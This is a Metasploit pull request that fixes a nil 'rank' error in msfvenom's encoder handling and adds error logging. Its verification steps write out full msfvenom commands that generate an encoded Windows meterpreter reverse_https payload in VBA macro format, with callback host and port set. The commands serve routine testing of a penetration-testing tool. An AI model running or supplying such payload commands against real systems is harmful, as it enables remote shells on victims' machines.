### PR TITLE
Fix #4047, msfvenom throws undefined method `rank' due to an invalid encoder name

### DIFF
--- a/lib/msf/core/payload_generator.rb
+++ b/lib/msf/core/payload_generator.rb
@@ -308,12 +308,14 @@ module Msf
       if encoder.present?
         # Allow comma seperated list of encoders so users can choose several
         encoder.split(',').each do |chosen_encoder|
-          encoders << framework.encoders.create(chosen_encoder)
+          e = framework.encoders.create(chosen_encoder)
+          encoders << e if e
         end
         encoders.sort_by { |my_encoder| my_encoder.rank }.reverse
       elsif badchars.present?
         framework.encoders.each_module_ranked('Arch' => [arch], 'Platform' => platform_list) do |name, mod|
-          encoders << framework.encoders.create(name)
+          e = framework.encoders.create(name)
+          encoders << e if e
         end
         encoders.sort_by { |my_encoder| my_encoder.rank }.reverse
       else

--- a/msfvenom
+++ b/msfvenom
@@ -300,6 +300,7 @@ if __FILE__ == $0
     venom_generator =  Msf::PayloadGenerator.new(generator_opts)
     payload = venom_generator.generate_payload
   rescue ::Exception => e
+    elog("#{e.class} : #{e.message}\n#{e.backtrace * "\n"}")
     $stderr.puts e.message
   end
 


### PR DESCRIPTION
For issue: https://github.com/rapid7/metasploit-framework/issues/4047

To verify:
- [x] Without the patch, if you do: `msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.33 LPORT=4444 -e shikata_ga_nai -i 3 -f vba`, you should see error: "undefined method `rank' for nil:NilClass"
- [x] With the patch, if you do: `msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.33 LPORT=4444 -e shikata_ga_nai -i 3 -f vba`, it should generate the payload anyway, but notice msfvenom will also say: "**Found 0 compatible encoders**"
- [x] With the patch, if you do `msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.33 LPORT=4444 -e x86/shikata_ga_nai -i 3 -f vba`, it will generate the payload, and notice msfvenom will say: "**Found 1 compatible encoders**"

The difference between step 2 and step 3 is one has x86/shikata_ga_nai, the other doesn't.
